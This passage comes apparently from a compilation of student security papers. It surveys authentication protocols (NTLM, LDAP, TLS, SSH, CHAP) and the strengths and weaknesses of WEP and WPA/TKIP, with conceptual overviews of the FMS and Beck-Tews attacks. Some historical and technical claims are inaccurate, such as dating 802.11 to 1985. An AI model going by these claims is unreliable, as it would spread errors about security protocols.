authentication methods and their main difference are their levels of encryption. LAN manager (LM): LM is the first form of secured authentication protocols and it was introduced along with Windows 3.11 [18]. LM authentication provides the weakest encryption and it is considered the least secure method out of the three of them [19]. NTLM Version 1: NTLMv1 replaced LM authentication and it is a more secure form of authentication as it uses 56-bit encryption and user credentials stored as NT hashes [19]. NTLMv1 is introduced in Windows NT 3.1 [18]. NTLM Version 2: NTLMv2 was later released to replace NTLMv1 and it was introduced in Windows NT Service Pack 4. It is the latest version of NTLM and is currently the most secured challenge-response authentication as it uses 128-bit encryption [19]. It is currently supported by all versions of Windows OS from Windows NT SP4 onwards [20]. Windows Vista and 181 newer version of Windows OS uses NTLMv2 as a fallback authentication in situations where Kerberos cannot be used. The protocol remains to be supported in Windows 2000 and above even though it is being replaced by Kerberos as the default [17]. 3.4.3 How does NTLM works? NTLM uses a challenge-response authentication method to allow clients to authenticate with the server without having to send their password (plaintext) to the server [14]. NTLM challenge-response mechanism consists of three messages which are known as negotiation, challenge and authentication. The following steps illustrate the process of NTLM authentication. As there were two type of authentication, interactive and non-interactive as part of the NTLM integrated single sign-on mechanism, only Step 1 will happen in the interactive authentication process: 1. First a user would enter a domain name, username and password into a client computer. Afterward, the password of the user would be cryptographic hashed by the computer and the plaintext password would be disposed of. 2. The client would send the username in plaintext form to the server 3. The server would then generates a 16-bytes random number challenge and sends it to the client 4. The client would take the challenge and encrypt it with the hash of the user's password and the client would send the result to the server as a response. 5. The domain controller would receive the username, challenge that is sent to the client and the response received from the client from the server. 6. The domain controller would then use the username to obtain the hash of the user's password from the Security Account Manager database and uses it to encrypt the challenge. 7. Finally, the domain controller would compare the result of encrypted challenge in Step 6 to the response given by the client. Authentication would be successful if they are the same [16]. 3.5 Lightweight Directory Access Protocol (LDAP) 3.5.1 Introduction to LDAP LDAP is a popular application protocol used for communicating record-based data and maintain distributed directory information services over a network. LDAP is based on a simpler standard than X.500. The directory services provide a set of records in a hierarchical structure such as Email directory. LDAP is mostly used in UNIX for authentication and found in many other business environments. 3.5.2 LDAP from a Historical Perspective 182 In early engineering stages, it was known as Lightweight Directory Browsing Protocol (LDBP) instead. LDAP was created by Tim Howes, Yeong Wengyik and Steve Kille in 1993. LDAPv3 was published in 1997 by the works of Tim Howes and Steve Kille. To understand LDAP from a historical perspective, we need to consider Directory Access Protocol (DAP) and X.500 from which it is derived [21]. In X.500, the Directory System Agent (DSA) is hierarchical in form and provides efficient and fast searching and retrieval. The Directory User Agent (DUA) provides functionality that can be implemented in all sorts of user interfaces through dedicated DUA clients, email applications or web server gateways [21]. DAP is used in X.500 services for controlling communications between DSA and DUA agents. LDAP is a subset of X.500 protocol and its clients are easier to implement and faster than X.500 clients. Active Directory supports access via LDAP from any LDAP-enabled client and it is not a pure X.500 directory [21]. Active Directory uses LDAP as the access protocol and supports the X.500 information model without requiring systems to host the entire X.500 overhead [21]. By combining LDAP, the best of X.500 naming standards and a rich set of APIs, Active Directory enables a single point of administration for all resources [21]. 3.5.3 How does LDAP works? It works in a way that is based on a client/server model. LDAP comes with some operations such as Bind, Search and Compare, Update Data and etc. LDAP‟s authentication process is supplied the Bind (authenticate) operation as it establishes the authentication state for a connection and sets the LDAP protocol version. An LDAP client must first authenticate itself to the LDAP service by connecting to the LDAP server known as a DSA on TCP port 389 and sends an operation request to server. A LDAP client that sends a LDAP request without “Bind” is treated as anonymous client [22]. The LDAP client must indicate to the LDAP server who is going to access the data so that the server can decide for the client what can be seen and do; this is known as access control. The server then responds with the answer or a pointer to another LDAP server where the client can obtain more information [22]. Clients do not need to wait for a response before sending the next request and in any order and similarly for the server as well. 3.5.4 Limitations of LDAP Depending on the versions of Name Service Switch (NSS), Pluggable Authentication Modules (PAM) and LDAP, Users might not be allowed to change their passwords [23]. Next, there is a possibility that the system only displays a user ID (UID), this is because UNIX and Linux clients might not be able to recognize users when they use commands such as ls or id [23]. Lastly, this may probably be a limitation on desktop 183 environments and is not being able to query LDAP directories correctly. As a result, users may find that the GUI environments do not work properly as expected. 3.6 Transport Layer Security (TLS) and Secure Sockets Layer (SSL) 3.6.1 Introduction to TLS/SSL Transport Layer Security (TLS) and Secure Sockets Layer (SSL) are public key cryptographic protocols developed for securing web browser and communication sessions. They encrypt network connections by using a message authentication code keyed beforehand for message reliability and asymmetric cryptography for privacy reasons. TLS/SSL provides authentication of clients to server through the use of cryptography and authenticated digital certificates. The specification was designed to enable other application layer protocols such as LDAP, FTP and TELNET to use SSL for communications. TLS/SSL ensures strong authentication, message privacy and integrity to servers and clients. It is mainly used to prevent man-in-the-middle, replay attacks, masquerade attacks and etc [24]. It is mostly implemented on top of any Transport Layer protocols. 3.6.2 TLS/SSL from a Historical Perspective Secure Sockets Layer (SSL) was developed by Netscape in 1994 to secure transactions over the Internet. In early versions of SSL, SSL Version 1.0 was not released to the public. On February 1995, SSL Version 2.0 was released with some security flaws and SSL Version 3.0 came out in 1996 to replace SSL Version 2.0. On January 1999, TLS 1.0 (SSL 3.1) was released as an upgrade to SSL Version 3.0 and they are not interoperable. The parties are required to negotiate the same protocol for communication if the same protocol is not supported by the both of them. On April 2006, TLS 1.1 (SSL 3.2) was released with additional protection against Cipher Block Chaining (CBC) attacks. On August 2008, TLS 1.2 (SSL 3.3) was released with the additions of Advanced Encryption Standard Cipher Suites and TLS Extensions definition. It was further improved in March 2011 on its backward compatibility with SSL. TLS provides some additional security improvements as compared to SSL such as Key-Hashing for Message Authentication Code (HMAC), consistent certificate handling, specific alert messages and etc [25]. Due to the ease of deployment and usage, it became a popular authentication method used in Windows OS. It works with most web browsers and OS such as Windows and UNIX as well. 3.6.3 How does TLS/SSL work? The TLS/SSL protocol can be divided into two different layers. The first layer consists of the application protocol and Handshake Protocol, the Change Cipher Spec Protocol, and Alert Protocol. The second layer is the Record Protocol. The record protocol is responsible for controlling the flow of data between two end points of a session. Symmetric protocols such as Triple Data Encryption Standard (3DES) are used for encryption. The handshake protocol authenticates either one or both endpoints of session then establish a unique symmetric key to generate set of keys for encryption and decryption of data which is used only for the unique SSL session [25]. 184 Once the handshake is completed then the data traversing in application layer will flow encrypted across the unique SSL session. The digital certificate, issued by a Certificate Authority (CA) can be assigned to the applications using SSL or either of the endpoints [25]. I will briefly explain on the steps in SSL handshake: 1. 2. 3. 4. 5. 6. The browser sends a nonce and requests to secure session from the Web server Web server sends its own certificate, CA, site information and a public key to the browser The browser verifies the certificate and obtains the server‟s public key The browser sends a pre-master session key encrypted with the server‟s public key The server decrypts the pre-master session key using its private key A secure connection is established after achieving the above steps 3.6.4 Limitations of TLS/SSL There is a lack of support for UDP traffic in TLS/SSL because it requires a stateful connection. Also, not all the setups have implemented both the server and client authentication. Lastly, using of TLS/SSL in tunnel mode can be expensive if the setup requires an external certification authority to sign those digital certificates [26]. 3.7 Secure Shell (SSH) 3.7.1 Introduction to SSH SSH uses various methods to authenticate remote user that is attempting to connect to the particular host. SSH works on the application layer of the OSI model. Rather than transmitting the user password in a plaintext across the SSH channel, the connecting computer will use the host public key to encrypt the user password to be transmit much safer as compare to using other application such as, Telnet. SSH utilize the theory of exchanging of public key during the authentication process to securely ensure that the password is encrypted, such that, even if a "man-in-the-middle" or "password-sniffing" manage to get hold of the encrypted text, he/she will not be able to crack the encrypted text to a plaintext easily without having the private key of the intended recipient. 3.7.2 SSH from a Historical Perspective SSH made it first appearance on the market in the year 1995. It was developed by researcher from University of Technology in Finland. The reason for the need of this SSH development was that, University of Technology in Finland was a regular victim of password attack sniffing in the early 1995. As a result, the researcher produces SSH for the university usage. During the beta phrase of SSH, it has managed to gain lots of publicity that attracted lots of attention which prompt the research that, it is possible to make SSH being as a commercial product. On July 1995, SSH-1 was being release by the researcher and it source code was made available to the public which allow them to use and edit it freely. At the end of 1995, due to the massive 185 support email that the research received asking for support help, the researcher setup a company named as "SCS, SSH communication security" to continue its development on SSH product. However, numerous problem and limited on SSH1 was discovered as the popularity of SSH1 skyrocketed. All of these problems and limitation cannot be fixed without losing its backward compatibility. This triggered the birth of SSH2 in 1996 which SSH2 uses new algorithm and it is not compatible with SSH1.In February 1997, an internet draft was submitted for SSH-2 protocol. In 1998, SSH was released by SCS. However, SSH-2 did not replace SSH1 because of two reasons. The first reason is because SSH-2 has a shortage of useful and practical features as compare to SSH-1. Second reason was that SSH-2 was not free to use except for qualifying educational institute and non-profit organization. Even after 3 years of the release of SSH-2, SSH-2 popularity did not overtake SSH1 at all even though SSH-2 provides a much better secure protocol [27]. 3.7.3 Public key authentication over SSH This method requires the use of a public key infrastructure technique to authenticate the user. The authentication process requires the server to have the knowledge beforehand of the details on the key that the user will like to use. Once the user decided the public key that he/she will like to use, it will be transmitted to the server side for it to check whether does the chosen public key is in the permitted list. If not, the authentication will be deemed as a failed one and the connection will be refused. Else, the server will use the chosen public key to encrypt a random generated 256-bit string to send it back to the user as a form of challenge text [28]. Once the user received the challenge text, the user will decrypt it using its corresponding private key. The decrypted challenge text is then combine with the session identified and send to a MD5 function to generate a hash value which must be send back to the server. If the hash value matches with the hash value which the server had calculated, then the authentication is a success! 3.7.4 Rhost authentication This method authenticates the machine rather than the user. User on the client machine may like to access an account that is available on the server. The SSH client will first request a connection to the server. The server will then use its DNS to check on the hostname using the client source IP address. Then, the server authenticates the machine by using two tests. First test will check to make sure that the client machine is listed as a trusted machine under the authorization rules, if found, authentication continue, else aborted and authentication had failed. The second test requires the server to check the program that is a trusted program installed by the system administrator of the client machine. The server verifies the second rule by making sure that the client machine is using the program that uses any privileges port number 186 (1-1023). The client machine can only utilize this range of privilege port with the superuser account privilege. Hence, this will be able to prove and satisfy the second rules [28]. Once this two rules has been confirmed as passed, the server will proceed on to verify that the client have permission to access the particular account that the client user will like to access on [28]. Out of all the available authentication methods, this method is the weakest one. This is because this method checked against the client host address [29]. In the modern network, IP address can be spoofed easily, DNS can be poisoned and users are often given the superuser privilege which allows them to use any privilege port freely. 3.7.5 Password authentication over SSH The password method of authenticating over a SSH channel was considered as the last resort that SSH will use to authenticate users when other authentication methods had failed [30]. Password authentication is accompanied by using the concept of Public Key Infrastructure to ensure that the transmitted password is encrypted and safe from man-in-the-middle attack. The following shows a simple illustration of how the SSH authentication work over the password model, which Alice is trying to connect to a server at sunfire.comp.nus.edu.sg. 1. Alice will key in the host address as “sunfire.comp.nus.edu.sg”, port number, her username and password. 2. „Sunfire.comp.nus.edu.sg‟ will acknowledge the request and send its own public key to Alice. 3. Alice will look into her list of trusted public key and search for the key of „sunfire.comp.nus.edu.sg‟. 3a. If the key is not found SSH will prompt Alice on whether she will want to allow the key from „sunfire.comp.nus.edu.sg‟ to be added to her trusted list. 3b. If a similar public key is found in the trusted list of Alice, it will proceed on to Step 4. 4. Alice will use that public key from Sunfire to encrypt all her authentication details that includes the username and password. At the same time, Alice computer will send her a copy of the public key to Sunfire host. 5. Once Sunfire receive the encrypted authenticaton details and Alice‟s public key, Sunfire will decrypt the authentication details by using it own private key and proceed to do the username and password authentication against their own database. 3.7.6 Host-Based authentication over SSH-2 187 In the SSH-2 protocol, it removed the authentication of SSH-1 Rhost method due to insecurity. However, SSH-2 embedded with another authentication method that is known as “host-based” authentication [30]. Host-based authentication required the client hostname instead of client IP address. This helps to eliminate the issue on client with a dynamic IP address, client behind a proxy, and client with more than one IP address. The authentication process required two identifiers, Nnet and Nauth. Nnet refers to the client name in the authentication request and Nauth refers to the name to look up through the client‟s network address. If both of these identifiers value are not the same, then the authentication process will be a failure [30]. 3.8 Challenge Handshake Authentication Protocol (CHAP) 3.8.1 Introduction to CHAP Challenge Handshake Authentication Protocol (CHAP) challenge-response is a threeway handshake authentication protocol used periodically to ensure the identity of a peer is valid [31]. It uses the hashing scheme of Message Digest 5(MD5) to encrypt the responses and it is also used by various network access servers and client vendors. Remote access clients that use CHAP are authenticated by any server with Routing and Remote Access supports CHAP and this is because CHAP uses the reversibly encrypted password [32]. CHAP Challenge and Response Process [31]: 1. The authenticator sends a “challenge” message to a peer after a link has been established. 2. A “one-way hash” function is used to calculate a value before being sent back to the authenticator by the peer 3. The value received is compared with the authenticator‟s own calculation of the expected has value and an authenticated is acknowledged if the values match. Otherwise, the connection should be terminated. 4. The authenticator periodically sends a new challenge to the peer at random intervals and the repetition of Steps 1 to 3 is done for every challenge. 3.8.2 CHAP from a Historical Perspective The development of CHAP was assumed in 1996 as defined in RFC-1994[33]. Microsoft's rendition of MS-CHAPv1 and MS-CHAPv2 are also assumed to be released on 1998(RFC-2433) [34] and 2000(RFC-2759) [35] respectively. Microsoft's versions were extensions and improvements to the original CHAP. Microsoft Challenge Handshake Authentication Protocol Version 1 is an encrypted password authentication protocol that is not reversible [36]. Microsoft Challenge Handshake Authentication Protocol Version 2 provides remote access connections stronger 188 security as compared to MS-CHAP version 1[37]. A general description of the differences and processes between MS-CHAPv1 and MS-CHAPv2 [38] are shown below: MS-CHAP Version 1 MS-CHAP Version 2 Begins CHAP with the value of 0x80 algorithm Begins CHAP with the value of 0x81 algorithm An 8-byte challenge is sent by the Server. A 16-byte challenge is sent by the client is used to create the 8-byte challenge value by the Server. A 24-btye LANMAN and NT response is sent by the client in response to the 8byte challenge. A same 16-btye peer challenge response used by the client to create the hidden 8byte challenge is sent together with the 24-byte NT response. A SUCCESS or FAILURE response is sent by the Server A SUCCESS or FAILURE response is sent by the server and it piggybacks an Authenticator Response to the 16-byte peer challenge. Based on the SUCCESS or FAILURE response above, the client then decides whether to continue with the connection. Based on the SUCCESS or FAILURE response above, the client then decides whether to continue with the connection. Additionally, if the expected value of the Authenticator Response is not valid when the client checks it, the connection is then disconnected. 4 Conclusions In conclusion, authentication methods are needed everywhere in our daily lives for authenticating different users and systems. The above authentication methods we have explored are ubiquitously available even till today. So far, we have seen the evolution of authentication methods over the years in terms of improvements on authenticating different users and systems. Now, we have reached an age of exponentially increasing services and processes are also getting more complex. Therefore, it is essential to use new set of sophisticated algorithms to implement newer authentication methods and security measures to safeguard against unauthorized access and potential attacks. It is important to ensure that sensitive data are not lost and visible to unauthorized people and trustworthiness of data is maintained while implementing newer authentication methods. 189 References 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. 13. 14. 15. 16. About Passwords, http://media.techtarget.com/searchSecurity/downloads/HackingforDummiesCh 07.pdf The History of Passwords, http://www.onlinepasswordgenerator.net/thehistory-of-passwords.php Introduction and Background of PKI, http://www.pdfsearchbox.com/TheAlliance-PKI-Initiative.html Public Key Infrastructure Details, http://searchsecurity.techtarget.com/definition/PKI History of PKI, www.saylor.org/site/wp-content/.../03/Public-keyinfrastructure.pdf Public Key Cryptography (PKC) History, http://www.livinginternet.com/i/is_crypt_pkc_inv.htm SANS Information on Authentication, http://www.sans.org/reading_room/whitepapers/authentication/overviewauthentication-methods-protocols_118 Kerberos Overview, Authentication Service for Open Network Systems, http://www.cisco.com/en/US/tech/tk59/technologies_white_paper09186a0080 0941b2.shtml Frequently Asked Questions about the MIT Kerberos Consortium, http://www.kerberos.org/about/FAQ.html Kerberos Authentication History, http://www.theworldjournal.com/special/nettech/news/kerberos.htm Sharing a Secret: How Kerberos Works, http://www.computerworld.com/computerworld/records/images/pdf/kerberos_ chart.pdf Kerberos Authentication Protocol, http://www.zeroshell.net/eng/kerberos/Kerberos-definitions/#1.3.8 Risk Assessment of Authentication Protocol: Kerberos, http://www.scribd.com/doc/59497058/Risk-Assessment-of-AuthenticationProtocol-Kerberos Protect Yourself against Kerberos Attacks, http://oreilly.com/pub/a/windows/excerpt/swarrior_ch14/index1.html The NTLM Authentication Protocol and Security Support Provider, http://davenport.sourceforge.net/ntlm.html Microsoft NTLM, http://msdn.microsoft.com/enus/library/aa378749%28VS.85%29.aspx 190 17. 18. 34. NTLM, http://www.webopedia.com/TERM/N/NTLM.html Protect against Weak Authentication Protocols and Passwords, http://www.windowsecurity.com/articles/Protect-Weak-AuthenticationProtocols-Passwords.html Authentication Types, http://www.tech-faq.com/authentication-types.html Understanding NTLM, http://cybernicsecurity.com/index.php/authentication/4-understanding-ntlmWindows Server TechCenter, http://technet.microsoft.com/enus/library/cc784450(WS.10).aspx ISeries Information Center V5R3, http://publib.boulder.ibm.com/infocenter/iseries/v5r3/index.jsp?topic=%2Frzai n%2Frzainhistory.htm Limitations and Differences between TLS/SSL as VPN Solution, http://olemartin.com/projects/VPNsolutions.pdf Managing Identity Information between LDAP Directories and Exchange Server 2010, http://allcomputers.us/windows_server/managing-identityinformation-between-ldap-directories-and-exchange-server-2010.aspx Authentication Using LDAP, http://tldp.org/HOWTO/LDAPHOWTO/authentication.html Windows IT Pro, LDAP Limitations, http://www.windowsitpro.com/article/ldap/ldap-limitations O‟Reilly Definitive Guide on History of SSH, http://docstore.mik.ua/orelly/networking_2ndEd/ssh/ch01_05.htm O‟Reilly Definitive Guide on SSH-1, http://docstore.mik.ua/orelly/networking_2ndEd/ssh/ch03_04.htm O‟Reilly Definitive Guide on SSH-2, http://docstore.mik.ua/orelly/networking_2ndEd/ssh/ch03_05.htm#ch03-80181 Type of SSH Authentication, http://www.psc.edu/general/net/ssh/authentication.php Challenge Handshake Authentication Protocol for PPP, http://www.javvin.com/protocolCHAP.html Microsoft TechNet: Windows Server TechCenter Library, http://technet.microsoft.com/en-us/library/cc757631(WS.10).aspx PPP Challenge Handshake Authentication Protocol, http://tools.ietf.org/html/rfc1994 MS PPP CHAP Version 1 History, http://tools.ietf.org/html/rfc2433 35. MS PPP CHAP Version 2 History, http://tools.ietf.org/html/rfc2759 19. 20. 21. 22. 23. 24. 25. 26. 27. 28. 29. 30. 31. 32. 33. 191 36. Microsoft TechNet, MS-CHAPv1 Definition, http://technet.microsoft.com/en-us/library/cc758984(WS.10).aspx 37. Microsoft TechNet, MS-CHAPv2 Definition, http://technet.microsoft.com/en-us/library/cc739678(WS.10).aspx 38. Cryptanalysis of Microsoft's PPTP Authentication Extensions (MSCHAPv2), http://www.schneier.com/paper-pptpv2.html 192 Different strategies used for securing IEEE 802.11 systems; the strengths and the weaknesses. Cheng Chang, Yu Gao National University of Singapore Abstract. Abstract: Different wireless security protocols are used to establish a secured wireless networks over time. With the understanding the underlying mechanism of each protocol, cross compare these protocols with each other to reach a final evaluation of each individual protocol. In this way, both strength and weakness can be shown clearly. Apparently, according to the history of these protocols, some of the protocols are modifications of the previous ones and some of them use completely new ideas to achieve a new standard of security. In the following paper, all the above information will be discussed in details. Keywords: wireless, security, WEP, WPA 1 Introduction The invention of wireless makes it possible for remote users to access the internet everywhere. It causes a dramatic shift in the development of laptop due to the convenience of accessing the internet. However, the chance of being interrupted whiling surfing on the internet is much higher than that of a wired connection. Thus, the need of a new secured network protocol is essentially necessary. In the following paper, all these protocols with respective underlying mechanisms that help to make the connection more secured will be discussed in details. At the same time, the strength and weakness will be evaluated through the comparisons between different protocols based on the underlying structures, techniques and methodologies that an individual protocol uses. 2 Wired Equivalent Privacy (WEP) Since the invention of the IEEE 802.11 in 1985, the wireless networks are not secured until the first reliable securing method is developed in 1999. This is 193 the Wired Equivalent Privacy. The intention of this WEP algorithm is to provide confidentiality and integrity to the unsecured wireless networks. 2.1 Algorithm Details: Confidentiality: Stream cipher RC4, which is a stream cipher that is widely used in many popular protocols such as Secure Sockets Layer (SSL) and WEP Mechanism behind RC4: Step 1: use key scheduling algorithm (KSA) to generate a key, which shall be between 40 to 256 bits. [1]The algorithm is as follows: for i from 0 to 255 S[i] := i endfor j := 0 for i from 0 to 255 j := (j + S[i] + key[i mod keylength]) mod 256 swap values of S[i] and S[j] endfor Step2: pseudo-random generation algorithm (PRGA). While there are still necessary iterations, the PRGA will output a byte of the key stream by updating the state. For each iteration, the PRGA increments “i” and adds the value in S[i] to j. After swapping the values of S[i] and S[j], output the final result S[i] + S[j] modulo 256. [2] The algorithm is as follows: i := 0 j := 0 while GeneratingOutput: i := (i + 1) mod 256 j := (j + S[i]) mod 256 swap values of S[i] and S[j] K := S[(S[i] + S[j]) mod 256] 194 output K endwhile Integrity: Cyclic redundancy check (CRC) is an error-detecting code designed to detect accidental changes to raw computer data, and is commonly used in digital networks and storage devices such as hard disk drives. [3] Mechanism behind CRC-32 checksum: The data are checked with a fix length depending on the length of the divisor that is selected. Append a number of bits that is one bit less than the length of the divisor to the original data. With the left most 1 as the start point, perform a long division algorithm. Divide the data after appended until it the original part is fully divided. Record the remainder of the long division and append this value to the original data as the checked data. For example: 00011010101110 000 1001 00001000101110 000 1001 00000001101110 000 1001 00000000100110 000 1001 00000000000010 000 10 01 ----------------00000000000000 010 <--<--<--<--- input left shifted by 3 divisor result divisor... <---remainder (3 bits) In this way, the new checked data of “00011010101110” becomes longer, which is “00011010101110 010”. The last three bit is the check sum. In the receiver side, they will also check it with the divisor 1001. For example: 195 00011010101110 010 bits 1001 00001000101110 010 1001 00000001101110 010 1001 00000000100110 010 1001 00000000000010 010 10 01 ----------------00000000000000 000 <--- input left shifted by 3 <--- divisor <--- result <--- divisor... <---remainder (3 bits) When the reminder becomes 0 in the receiver side, it means there is no error during transmission. 2.2 Authentication Details: Open system: In Open System authentication, the client of the WLAN does not need to give his/her passwords and username to the Access Point. As a result, all clients are able to access to the Access Point without any authentication. While the user access to the Access Point, authentication occurs. Users have to enter the corresponding username and password into the system in order to use the Access Point. Shared key: In Shared Key authentication, authentication takes place in form of question and answers between server and client: 1. The client sends an authentication request to the Access Point. 2. The Access Point replies with a question. 3. The client encrypts the question with the configured WEP key, and sends it back in another authentication request. 196 4. The Access Point decrypts the answer. If it matches the question, the Access Point admits the connection and sends back a positive reply. After the connection established, the pre-shared WEP key is also used for encrypting the data frames using RC4. [4] 2.3 Evaluation: Strength: Major strength: 1. Previously, stream ciphers use linear feedback shift registers (LFSRs). Since these registers are only efficient in the hardware part, the performance in software section is not good enough. In contrast, the CR4 does not use LFSRs. With simple byte manipulations, it provides good performance in the software section. It uses 256 bytes of memory for the state array and k bytes for the key. It use a bitwise AND operation with 255 to replace the original modular reduction of some value modulo 256. [5] 2. Since RC4 is a stream cipher, it is better than the block cipher in terms of preventing the BEAST attack on TLS 1.0. This is an important advantage due to the methodology itself. For block cipher, since it is implemented with fix length encryption, it is easy for the BEAST to accommodate and steal the user information.[6] Other strength: 1. The use of cyclic redundancy check is a cheap-to-implement and accurate implementation. It can be easily implemented at the hardware level. Just by simple bits manipulation, it can record the necessary data for error detection, for example, to detect the error in noise channels. Weakness: Major flaws: • RC4 does not take a separate nonce alongside the key. If multiple streams are encrypted, the key shall be combined together with a specific 197 algorithm. However, RC4 normally does not have such an algorithm, it just simply append the initialization vector to the key. Thus, by using the keys of WEP concatenated with a 24-bit initialization vector (IV) as the key for the RC4, it is not secure enough. At the same time, since the 24-bit IV is fixed, which is too short, it is easy for the hackers to attack it. [7] • Since RC4 is a stream cipher, the traffic keys are not supposed to be used repeatedly. The use of IV is just to prevent the key to be duplicated. However, the IV is not long enough. In a busy network, it is highly possible that the same traffic key appear repeatedly. For a 24-bit IV, there is a 50% probability the same IV will appear after each 5000 packets. • In addition, because RC4 is a stream cipher, it is more malleable than common block ciphers. It is vulnerable to a bit-flipping attack if it is not used together with a strong message authentication code. Actual events: In August 2001, Scott Fluhrer, Itsik Mantin, and Adi Shamir (FMS) published a cryptanalysis of WEP that exploits the way the RC4 cipher and IV is used in WEP, resulting in a passive attack that can recover the RC4 key after eavesdropping on the network. Depending on the amount of network traffic, and thus the number of packets available for inspection, a successful key recovery could take as little as one minute. If an insufficient number of packets are being sent, there are ways for an attacker to send packets on the network and thereby stimulate reply packets which can then be inspected to find the key. The attack was soon implemented, and automated tools have since been released. It is possible to perform the attack with a personal computer, off-the-shelf hardware and freely available software such as aircrack-ng to crack any WEP key in minutes. [8] FMS attack algorithm overview: Step 1: Start of KSA and IV is sent in clear text K = IV|K-WEP. Step 2: 198 Discover weak IVs such that KSA is resolved and output leaks information about the key itself. With every weak IV found, guess 1 byte of K. The average is 60 guesses per byte needed for recovering K. Step 3: When trying to recover K [A]: SI[1] < I and SI[1] + SI[SI[1]] = I + A After I steps results in resolved condition after I + A steps with high probability. Weak IV: (A+3, n-1, X). [8] Other Flaws. • In Generate RC4 keys: The number of keys used for WEP is not long enough, for example WEP-40 with key length 40. In addition, these keys are normally used in terms of ASCII code, which has less number of variations. Only a small percent of the 40 bit number have an ASCII representation. This makes the WEP more unsecure. • In cyclic redundancy check: This algorithm is specifically designed to check the normal types of errors occurred during communication channels. It itself is efficient, simple and accurate. However, when there is an attack intentionally, the algorithm does not protect the user from the attackers. It is easy to manipulate the data such that they have the same cyclic redundancy check values or to recalculate the check value to match the corrupted data frames. [9] • In authentication phase: The share-key authentication is less secure than the open system. Even though it provides the identification check as long as the client wants to connect with the Access Point, the key streams may be easily captured by the third party during this handshake process. As a result, it is better to use 199 open authentication rather than the share-key authentication although the open system authentication is also a weak authentication method. 2.4 Minor Modifications WEP2: Due the fact that the initialization vector is so short that is it easier to launch a stream cipher attack, WEP2 extended both the length of the IV key and the key of itself to 128 bits, compared to 24 bits and 40 bits in the previous version of WEP. In this way, the extended keys make a longer key for RC4. [10] In so doing, the WEP2 helps to eliminate the duplicate IV deficiency and stop brute force key attack to some extent. At the same time, since the keys become longer, the amount of possible ASCII combinations are also become more. However, just as the previous version, the ASCII combinations are still a small fraction of the bit combination of the key. Lots of them are wasted in this way. WEP+: Some of the plaintext initialization vectors statistically lead the pre-shared keys. They IVs are referred to the weak IVs. WEP+ filters out the weak IVs so that there are no more weak IVs that can be used by the attackers to crack the WEP+. [11] However, this implementation works only when both the ends of the wireless connection. This can hardly be enforced. At the same time, the WEP+ only solves this particular statistical flaw in the encryption process. Other statistical flaws still exist with WEP+. 3 Wi-Fi Protected Access (WPA) Since the Wired Equivalent Privacy (WEP) has various serious weaknesses [12], the Wi-Fi Alliance designed security certification programs and two security protocols to replace the older security algorithm, Wired Equivalent 200 Privacy (WEP), used for IEEE 802.11 wireless networks. The first security protocol, Wi-Fi Protected Access (WPA), was intended as an intermediate measure to replace the WEP. WPA has implemented the majority of the IEEE802.11i standard. The Temporal Key Integrity Protocol (TKIP) is also included in WPA to replace the old 40-bit or 128-bit encryption key which used in WEP that must be manually entered on wireless access points and devices and does not change [13]. 3.1 Temporal Key Integrity Protocol (TKIP) Background: As a security protocol used in the IEEE 802.11 wireless networking standard, TKIP is designed by the IEEE802.11i task group and Wi-Fi Alliance as a solution to replace WEP without upgrading of the legacy hardware are left by the Wi-Fi networks without viable link-layer security [14]. Mechanisms: TKIP and the related WPA standard, implement three new security features to address security problems encountered in WEP protected networks: • Firstly, a key mixing function that combines the secret root key with the initialization vector before passing it to the RC4 initialization is implemented in the TKIP. • WEP, in comparison, merely concatenated the initialization vector to the root key, and passed this value to the RC4 routine which permitted the vast majority of the RC4 based WEP related key attacks [15]. • Secondly, a sequence counter is implemented to protect against replay attacks. The access point will reject the packets that are received out of order. • Finally, a 64-bit Message Integrity Check (MIC) is implemented in the TKIP [16]. TKIP uses RC4 as its cipher in order to be able run on legacy WEP hardware with minor upgrades. It also provides a rekeying mechanism and ensures that every data packet is sent with a unique encryption key. 201 3.2 Message Integrity Check: • In order to prevent an attacker from capturing, altering and/or resending data packets, a message integrity check (MIC) has been included inside the WPA. • The cyclic redundancy check (CRC) in WEP standard has been replaced by the MIC and it provides a strong data integrity guarantee for the handled packets than the CRC with the usage of the Integrity Check Value (ICV)[17]. • MIC with another identification term message authentication code (MAC) is the information used to authenticate a message [18]. • The algorithm of MIC (or keyed hash function), uses a secret key with an arbitrary-length message for the purpose of authentication. This protects the integrity and the authenticity of the message’s data, by allowing verifiers to detect the changes in the message content. • The cryptographic primitives, such as cryptographic hash function or block cipher algorithms can be used to construct the MIC or MAC algorithms. However many of the fastest MAC algorithms such as UMAC and VMAC are constructed based on universal hashing [19]. 202 MAC Example: In this example, the sender of a message runs it through a MAC algorithm to produce a MAC data tag. The message and the MAC tag are then sent to the receiver. The receiver in turn runs the message portion of the transmission through the same MAC algorithm using the same key, producing a second MAC data tag. The receiver then compares the first MAC tag received in the transmission to the second generated MAC tag. If they are identical, the receiver can safely assume that the integrity of the message was not compromised, and the message was not altered or tampered with during transmission [20]. 3.3 Strength: • With the new features that implemented in TKIP, WPA will be more secure than WEP since the key mixing inside the TKIP increases the complexity of decoding the keys by giving an attacker substantially less data that has 203 been encrypted using any one key. As such, the WEP key recovery attacks has been eliminated. • Many existing attacks are discouraged by the message integrity check (MIC), broadcast key rotation, per-packet key hashing and a sequence counter. As a result, TKIP raise the difficulty for many attacks so that make the wireless networks with WPA protocol more secure than the wireless networks with WEP protocol. 3.4 Weaknesses: Since TKIP uses the same underlying mechanism as WEP, it is consequently vulnerable to a number of similar attacks. Furthermore, due to the changes in the algorithm of the protocol, the weakness of some of the additions leads to new attacks including the Beck-Tews attack and Ohigashi-Morii attack. Beck-Tews attack: ─ Beck-Tews attack is a key-stream recovery attack that, if successfully executed, permits an attacker to transmit 7-15 packets of the attacker’s choice on the network [21]. ─ It is an extension of the WEP chop-chop attack which is that when an attacker guess individual bytes of a packet, if it is correct confirmed by the wireless access point, the attacker will be able to continue to guess other bytes of the packet. ─ In addition, the attack is able to avoid the countermeasures from the checksum mechanism and the message integrity check (MIC) so that the attacker is able to access the key-stream of the packet and the MIC code session. ─ The attack can also circumvent the WPA implemented replay protection by using the utilized Quality of Service (QoS) channels. ─ As such, it will lead to attacks including ARP poisoning attacks, denial of service, and other similar attacks. 204 e.g. In October 2009, Halvorsen with others made a further progress, enabling attackers to inject a larger malicious packet (596 bytes, to be more specific) within 18 minutes and 25 seconds [22]. Ohigashi-Morii attack: • Japanese researchers Toshihiro Ohigashi and Masakatu Morii reported the attack which is built on the Beck-Tews attack [23]. • The Ohigashi-Morii attack utilizes the similar attack method, but uses a man-in-the-middle attack and does not require the vulnerable access point to have Quality of Service (QoS) enabled. 4 